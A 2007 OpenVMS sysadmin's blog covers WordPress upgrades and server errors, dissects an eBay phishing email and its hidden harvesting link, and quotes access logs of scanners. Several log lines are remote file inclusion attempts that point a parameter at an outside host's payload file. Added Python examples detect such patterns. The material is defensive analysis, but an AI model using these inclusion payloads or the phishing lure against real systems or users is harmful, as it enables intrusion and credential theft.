30-Apr-2007

Update
Tonight I updated the blog to WordPress version 2.1.3, as simple as usual (back up all files, remove a number of PHP files, roll out the zip file (in the generic location) and run the upgrade script – once for each of the blogs), and the specific include file that I had to edit in the beginning (classes.PHP) has been disabled by now – the code now runs out-of-the-box.
The theme that I use now isn't fully compatible, it seems: the image of the OpenVMS Forum expanded well into the textual area, so I removed the link to the image. For the rest, it looks good.
Reason for this update: I want to create a blog on this year's bootcamp, either within SYSMGR or separately. I found a nice theme that I can use – after some adaptations. I'm still working on that. It may become the major entry point of the web as well – this is under investigation. But there is one problem: it requires a plugin that causes tremendous problems: it causes any admin function to fail – even when not enabled – by exhausting over 8 Mb of memory (that is: 800.000 in hex). And I found it may require PHP 4.3 – at least. So whether it can be used remains to be seen.
Webserver issues?
It looks as if the webserver has some problems – it seems to stall sometimes; even static pages won't show up. I restarted the server yesterday, since there had been very heavy traffic for a few minutes, causing a lot of page faults and leaving the pagefile about 70% full – where it was less than 50% before. It did make some difference, but I guess I'll need to do more. But a full stop of the system is out of the question, unless as a last resort.

Phishing

This message appears to come from eBay, but here are a few clues that show it's fake.
The original message is HTML – not uncommon – but that hides one crucial item.

The text itself should trigger you directly: it starts with the wrong header in the first place.

Dear eBay Community Member,

Next it tries to frighten you off:

We regret to inform you that your eBay account
has been suspended due to concerns we have for the
safety and integrity of the eBay community.

and it continues with some more blah blah to push up the pressure, until it offers relief:

Due to the suspension of this account, please be advised you are prohibited from using eBay in any way. This includes the registering of a new account. To confirm that you are the righfull owner of the account please confirm your identity by signing in and resolving this dispute
at: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&CaseID142Disupte#1562

Right? This is where the danger lurks – the hidden information. What you don't see in HTML is the real link:

<a href="http://credit-card-application.docflow.info/.dll/link.php" target=_blank rel=nofollow></a>

I didn’t try that one, but quite likely it will try to get your identity (username and password) and, likely, credit card information.

Nice: you ARE warned, because to “legalize” the attempt, the message ends:

Please note that any seller fees due to eBay will immediately become due and payable. eBay will charge any amounts you have not previously disputed to the billing method currently on file. Confirm your identity at the following link we provided signing in and resolving this dispute:
Regards,
Safeharbor Department eBay, Inc.

The message header (normally hidden but well worth examining) shows some interesting features as well:

Return-Path: member@ebay.com
Received: from 66.228.114.66-static.reverse.softlayer.com (66.228.114.66)
by diana.intra.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Fri, 27 Apr 2007 00:05:45 +0100 (CET)
Received: from nwblwibas02-pool1-a154.nwblwi.tds.net ([69.128.127.154] helo=User)
by cpanel.mysteryserver.net with esmtpa (Exim 4.63)
(envelope-from )
id 1HhC5H-0005kH-MJ; Thu, 26 Apr 2007 23:05:03 +0100
Reply-To:

From: “eBay Inc.”

Subject: FPA NOTICE: eBay Registration Suspension – User Agreement – Abusing eBay
Date: Thu, 26 Apr 2007 17:05:37 -0500
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – cpanel.mysteryserver.net
X-AntiAbuse: Original Domain – grootersnet.nl
X-AntiAbuse: Originator/Caller UID/GID – [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain – eBay.com
X-Source:
X-Source-Args:
X-Source-Dir:

A few things to keep in mind:

nwblwibas02-pool1-a154.nwblwi.tds.net

This looks like a broadband address from a home system – it’s a (rather basic) Windows PC:

Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

When really sent from eBay, it might have been done by a Windows system, but I don’t think they will use “Outlook Express“.
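The two clues this post relies on – the real href behind the visible link, and the first-hop host in the Received: chain compared with the claimed sender domain – can be checked mechanically. This is an added example, not code from the original post; the sample message is constructed from the headers and the hidden link quoted above, and the sender address and the visible anchor text are assumptions.

```python
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample from the headers and hidden link quoted in the post;
# the sender address and the visible anchor text are assumptions.
RAW_MESSAGE = b"""Return-Path: member@ebay.com
Received: from 66.228.114.66-static.reverse.softlayer.com (66.228.114.66)
 by diana.intra.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Received: from nwblwibas02-pool1-a154.nwblwi.tds.net ([69.128.127.154] helo=User)
 by cpanel.mysteryserver.net with esmtpa (Exim 4.63)
From: "eBay Inc." <member@ebay.com>
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-Type: text/html; charset="Windows-1251"

<p>please confirm your identity by signing in and resolving this dispute at:
<a href="http://credit-card-application.docflow.info/.dll/link.php"
 target=_blank>https://signin.ebay.com/ws/eBayISAPI.dll?SignIn</a></p>
"""

ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)

def mismatched_links(html):
    """(shown, real) pairs where the visible link text is a URL on another host."""
    hits = []
    for href, text in ANCHOR_RE.findall(html):
        shown = re.sub(r'<[^>]+>', '', text).strip()
        if shown.lower().startswith(('http://', 'https://')) and \
                urlparse(shown).hostname != urlparse(href).hostname:
            hits.append((shown, href))
    return hits

def origin_host(msg):
    """'from' host of the last Received: line, i.e. the first hop (relays prepend)."""
    received = msg.get_all('Received') or []
    m = re.search(r'from\s+(\S+)', received[-1]) if received else None
    return m.group(1) if m else None

def analyse(raw):
    msg = email.message_from_bytes(raw, policy=policy.default)
    html = msg.get_body(preferencelist=('html',)).get_content()
    claimed = email.utils.parseaddr(str(msg['From']))[1].rpartition('@')[2].lower()
    origin = origin_host(msg) or ''
    return {'links': mismatched_links(html),
            'origin': origin,
            # true only if the first hop sits inside the claimed sender's domain
            'origin_in_claimed_domain': origin.lower().endswith('.' + claimed),
            'mailer': str(msg['X-Mailer'])}
```

For the sample above, `analyse(RAW_MESSAGE)` reports the docflow.info href behind the signin.ebay.com text, a first hop on tds.net rather than ebay.com, and the Outlook Express mailer string.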

Still thinking default?

Defaults are dangerous.
Therefore, in general, I consider installing packages in their default locations a bad idea. Having the locations writable is dangerous as well.
This is why:

130.91.197.190 - - [16/Apr/2007:15:02:47 +0100] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:49 +0100] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /scgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi-bin/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scgi/awstats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /scripts/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:52 +0100] "GET /cgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /scgi-bin/stats/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868

What if the file existed? That would mean the site had been compromised before. But since none of the packages exist – or they reside in a different (not-so-obvious) place – these requests did no more harm than using some CPU, memory and IO.
The same applies to the next requests, some time later:
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:29 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
...
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360

If I had packages installed in their default locations, how safe would I have been?
Not that I'm totally immune, but at least avoiding defaults secures the system against these simple attacks. Of course, whoever is scanning the web will locate the obvious. And of course, there is a [WORDPRESS] directory. But not here!

Some stupid thinking again: what does WAMP stand for? Windows/Apache/MySQL/PHP?
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
80.237.144.181 - - [22/Apr/2007:13:24:43 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767

Either they phoned each other, or he renewed his IP address; there are just seconds in between.
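The probes quoted in this section can be triaged from the access log itself. This is an added example, not code from the original post: it parses common-log lines, counts per client the requests for default install paths that were not served here (a 404 or a redirect away), and flags query parameters whose value is itself a URL, as in the appserv_root and no_url requests above. The sample lines are taken from the log excerpts quoted above; the path list and the threshold of five probes are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample, taken from the log lines quoted in the post.
SAMPLE_LOG = """\
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:48 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:50 +0100] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:51 +0100] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 868
130.91.197.190 - - [16/Apr/2007:15:02:53 +0100] "GET /stats/awstats.pl HTTP/1.0" 404 868
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
217.10.154.200 - - [16/Apr/2007:16:08:28 +0100] "GET /NoService.html HTTP/1.0" 200 2135
217.172.47.130 - - [21/Apr/2007:12:22:15 +0100] "GET /appserv/main.php?appserv_root=http://217.172.47.130/a.txt?& HTTP/1.1" 302 360
81.169.155.140 - - [22/Apr/2007:13:24:29 +0100] "GET /cgi-bin/query/wamp_dir/setup/yesno.phtml?no_url=http://digilander.libero.it/atreus888/r0x/freeman.txt? HTTP/1.1" 404 767
""".splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

# Default install paths the post shows being probed (assumed list; extend as needed).
DEFAULT_PATHS = ('xmlrpc.php', 'awstats.pl', 'phpmyadmin', 'wamp_dir')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_default_probe(target):
    return any(p in urlparse(target).path.lower() for p in DEFAULT_PATHS)

def url_params(target):
    """Query parameters whose value is itself a URL (remote-include probes)."""
    qs = parse_qs(urlparse(target).query, keep_blank_values=True)
    return [(k, v[0]) for k, v in qs.items()
            if v and v[0].lower().startswith(('http://', 'https://'))]

def triage(lines, threshold=5):
    """Return (scanner IPs, remote-include attempts) for a batch of log lines."""
    probes = defaultdict(int)
    rfi = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # a default path that was not served here (404 or a redirect away)
        if rec['status'] != '200' and is_default_probe(rec['target']):
            probes[rec['ip']] += 1
        for name, value in url_params(rec['target']):
            rfi.append((rec['ip'], name, value))
    return sorted(ip for ip, n in probes.items() if n >= threshold), rfi
```

On the sample, `triage(SAMPLE_LOG)` names 130.91.197.190 as the only scanner over the threshold and lists the two requests that tried to pull in a remote file.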

22-Apr-2007

Minor Soymail problem
Last Friday, Soymail crashed on accessing one particular message:
%HTTPD-W-NOTICED, 19-APR-2007 06:29:11, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, https://xxxxxxxxxx
-NOTICED-I-CLIENT, aaa.bbb.ccc.ddd
-NOTICED-I-URI, POST (18 bytes) /cgi-bin/soymail/~
-NOTICED-I-SCRIPT, /cgi-bin/soymail CGI-BIN:[000000]SOYMAIL () CGI-BIN:[000000]SOYMAIL.EXE
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (118 bytes)
%SYSTEM-F-ACCVIO, access violation, reason mask=00, virtual address=0000000000000000, PC=00000000000994E8, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:3350/0 net:493/0

but other messages were fine. I created WATCH files of both and sent them to Mark Daniel; he requested a debug output from SOYMAIL (just set up one SYSTEM logical and it's done! – don't forget to deassign it afterwards) and he came up with the reason: the header contains a LF character where the standard doesn't allow one. He made a patch and sent it. This solved the problem. It's preliminary, so I should consider it beta. But it works now, so I leave it on the system. The new version will soon be released anyway.

For the rest – nothing in particular. Just that I've been looking into WP version 2.1.3 – still have to see if this theme is all right. I had a look at another one, but that is to be changed somewhat – I'm missing parts I want to have. But in general, it looks good.
For the bootcamp blog, I will use WordPress, I think. PHPBB2 is actually overdone, and Phorum (which has a blog facility) cannot be used for now due to the PHP version.
Minor WordPress problem
Browsing older entries I noticed that some had the wrong date as their title. I tried to change that by editing the message in WordPress, but for some reason this failed and the changes were not applied:
%HTTPD-W-NOTICED, 22-APR-2007 23:03:19, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 192.168.0.33
-NOTICED-I-URI, POST (26 bytes) /sysblog/wp-admin/post.php
-NOTICED-I-SCRIPT, /sysblog/wp-admin/post.php sysblog:[wp-admin]post.php (cgi_exe:phpwasd.exe) SYSBLOG:[wp-admin]post.php
-NOTICED-I-CGI, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:1986/0 net:962/0

so I had to use phpMyAdmin to make the changes directly in the database. It may speed up installation of 2.1.3….

17-Apr-2007

PHP trouble
Looking into Operator.log, I noticed a number of messages like:
%%%%%%%%%%% OPCOM 16-APR-2007 01:15:59.12 %%%%%%%%%%%
Message from user HTTP$SERVER on DIANA
Process HTTPd:80 reports
%HTTPD-W-NOTICED, CGI:1969, not a strict CGI response

Looking into the webserver log, it's quite obvious. Since 13-Apr-2007, it happens again and again, several times in a row:
%HTTPD-W-NOTICED, 13-APR-2007 03:06:37, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 87.118.112.246
-NOTICED-I-URI, GET (22 bytes) /sysblog/index.php?p=4
-NOTICED-I-SCRIPT, /sysblog/index.php sysblog:[000000]index.php (cgi_exe:phpwasd.exe) SYSBLOG:[000000]index.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (62 bytes) %DEBUGBOOT-W-CHN, assign channel system service request failed
-NOTICED-I-RXTX, err:0/0 raw:319/0 net:319/0

and mostly from this address – and one or two others. Not just on the weblog; the very same occurred on the forum index page.
In the access log, it shows up as well – inside a whole bunch of accesses to the blog:
87.118.112.246 - - [13/Apr/2007:03:06:30 +0100] "GET /sysblog/index.php?m=200701 HTTP/1.0" 200 16701
87.118.112.246 - - [13/Apr/2007:03:06:37 +0100] "GET /sysblog/index.php?p=4 HTTP/1.0" 502 881
87.118.112.246 - - [13/Apr/2007:03:06:39 +0100] "GET /sysblog/index.php?m=20070104 HTTP/1.0" 200 11351

According to the access log, the whole blog has been extracted:
87.118.112.246 - - [13/Apr/2007:03:03:25 +0100] "GET / HTTP/1.0" 200 3475
87.118.112.246 - - [13/Apr/2007:03:03:28 +0100] "GET /forums/index.php HTTP/1.0" 200 22584
...
87.118.112.246 - - [13/Apr/2007:03:46:06 +0100] "GET /sysblog/index.php?page_id=2 HTTP/1.0" 200 9767
87.118.112.246 - - [13/Apr/2007:03:46:11 +0100] "GET /sysblog HTTP/1.0" 404 868

and as far as I could quickly scan the logfile, it's every entry, but each is valid.
On 14-Apr-2007, there was another wave of access – from the same address:
87.118.112.246 - - [14/Apr/2007:21:35:46 +0100] "GET / HTTP/1.0" 200 3475
87.118.112.246 - - [14/Apr/2007:21:35:48 +0100] "GET /forums/index.php HTTP/1.0" 200 22584
87.118.112.246 - - [14/Apr/2007:21:35:53 +0100] "GET /sysblog/index.php HTTP/1.0" 200 14884
...
87.118.112.246 - - [14/Apr/2007:21:44:29 +0100] "GET /sysblog HTTP/1.0" 404 868
87.118.112.246 - - [14/Apr/2007:21:44:29 +0100] "GET /sysblog/index.php?feed=rss2&p=36 HTTP/1.0" 200 793

Just getting the feeds, perhaps?
The address doesn’t translate to a domain, it seems, but I could get at least some hint. It appears to be German:
$ dig -x 87.118.112.246

; <<>> DiG 9.3.1 <<>> -x 87.118.112.246
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35963
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;246.112.118.87.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
246.112.118.87.in-addr.arpa. 71593 IN   PTR     ns.km30229.keymachine.de.

;; AUTHORITY SECTION:
112.118.87.in-addr.arpa. 28648  IN      NS      ns.keyweb.de.
112.118.87.in-addr.arpa. 28648  IN      NS      ns2.keyweb.de.

;; ADDITIONAL SECTION:
ns.keyweb.de.           83446   IN      A       62.141.60.15
ns2.keyweb.de.          83446   IN      A       62.141.49.15

;; Query time: 706 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Apr 17 18:28:13 2007
;; MSG SIZE  rcvd: 157

At least, I have one more question to be answered at the bootcamp!
Bootcamp blog
Speaking about the OpenVMS bootcamp: such a blog is something I consider setting up. I may use Phorum, if that works with the currently installed MySQL version, which I doubt since the release notes tell me I need at least 4.3 and I'm running 4.1 on VMS. Otherwise, I may create another PHPBB2 forum for it, either new or an expansion of the Dutch forums, or I could take the opportunity to get it running using WordPress 2.1.
There is too little time to develop a full-featured real-VMS application to do the job ;).